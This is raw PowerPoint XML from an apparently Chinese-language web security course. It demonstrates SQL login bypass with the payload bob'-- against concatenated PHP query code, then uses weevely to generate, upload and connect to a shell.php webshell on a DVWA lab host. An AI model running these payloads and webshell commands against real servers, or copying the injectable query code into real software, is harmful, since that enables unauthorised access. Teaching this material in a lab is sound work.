                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bob'--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</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密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"abc123"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时，浏览器会向服务器发送请求：</a:t>
            </a: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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http://xxxx.com/login.php?user=bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>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&amp;passwd=abc123</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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384032" y="1118601"/>
            <a:ext cx="1107996"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服务端</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320831" y="1591585"/>
            <a:ext cx="5111750" cy="4662815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sql</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"select * from user where username = '"</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$_GET</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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"user"</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 and password = '"</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$_GET</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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"passwd"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$result</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>query</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器接收到这个请求，将构建并执行一条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查询：</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN"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en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select * from user where username = 'bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>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 and password = 'abc123’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>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SQL</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语言中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--</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表示注释符，后面的内容将会被当做注释处理，也就是说，对于伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr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bob</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的用户，并不需求提供正确的密码，就可以查询到</a:t>
            </a:r>
            <a:r>
              <a:rPr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bob</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的相关信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255339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637668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第二步：用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>生成一句话木马</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell.php</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54EF21C-F93C-8EE3-030E-33C78E2C4F94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1706792"/>
            <a:ext cx="10369152" cy="753220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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按照提示的使用方法，输入命令</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r>
              <a:rPr kumimoji="1"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 generate pass </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来生成</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WebShell </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 sz="18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连接密码是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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pass</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="18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CEB8350-54B4-C63C-16DD-656AB91EAFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="892025" y="2579823"/>
            <a:ext cx="10369151" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C2B9F4-0355-58A2-388D-BE6E81AFD080}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="892025" y="3573016"/>
            <a:ext cx="10369151" cy="2088232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3318812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489749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第三步：上传一句话木马</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell.php</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54EF21C-F93C-8EE3-030E-33C78E2C4F94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1706792"/>
            <a:ext cx="10369152" cy="406971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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回到上传页面，点击</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>选择文件</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按钮，将</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生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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文件进行上传。</a:t>
            </a:r>
            <a:endPar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93FC6761-591B-DC8E-7FFF-891245BB72A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911425" y="2258020"/>
            <a:ext cx="10369152" cy="3907284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1487737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335861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第四步：连接</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell.php</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54EF21C-F93C-8EE3-030E-33C78E2C4F94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1706792"/>
            <a:ext cx="10369152" cy="1445717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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上面的网页显示</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所在的地址是：</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../../hackable/uploads/</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，结合当前地址：</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http://192.168.180.135/</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/vulnerabilities/upload/#</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，可以计算出</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的目录。</a:t>
            </a:r>
            <a:endPar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使用命令</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weevely</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 http://192.168.180.135/</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dvwa</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/hackable/uploads/</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 pass</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连接</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，就建立了</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WebShell</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连接，拿到了服务器权限。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DBF0E52-B291-6A48-1230-E42B58342F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="3205981"/>
            <a:ext cx="10369152" cy="3031331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2162650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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>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2" y="1052513"/>
            <a:ext cx="10651295"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217AC1B-0F12-CEB2-436F-4C0C538DED9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1148820"/>
            <a:ext cx="335861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第四步：连接</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0048AA"/>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54EF21C-F93C-8EE3-030E-33C78E2C4F94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1706792"/>
            <a:ext cx="10369152" cy="406971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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执行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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rPr>
              <a:t>ls</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命令，可以看到当前目录下的文件，其中就有我们上传的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89752263-2193-86B1-E63B-F1E8316010CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="947427" y="2220414"/>
            <a:ext cx="10297145" cy="3728866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="785558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834EA03-9934-C46B-4918-0FAF7699C415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="635001"/>
            <a:ext cx="9753600" cy="1353840"/>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文件上传漏洞产生的原因是</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2911A0-C6D4-730F-404E-BCDC0D3B59EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2060848"/>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滥用了文件上传插件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A403AEB8-BCF7-F669-4ABD-2D6BD6775270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2918098"/>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缺少上传文件信息的输入检测 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E089D1D7-6CFA-2DC6-B912-4B290E3F0509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="3775348"/>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缺少对</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Webshell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的检测机制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="椭圆 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FBAF963-0353-BD3B-59EC-2375DBF24E9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="2125141"/>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763753EA-DB4B-4DE5-071D-2AF2911C7134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="2982391"/>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E93B1C26-7D40-DBA6-90B2-4A616D58B03E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="3839641"/>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5" name="矩形: 圆角 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F87678C-C5B1-9149-B6CD-3E8573A170D8}"/>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4BBB6F74-5916-9005-9807-C408559997CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
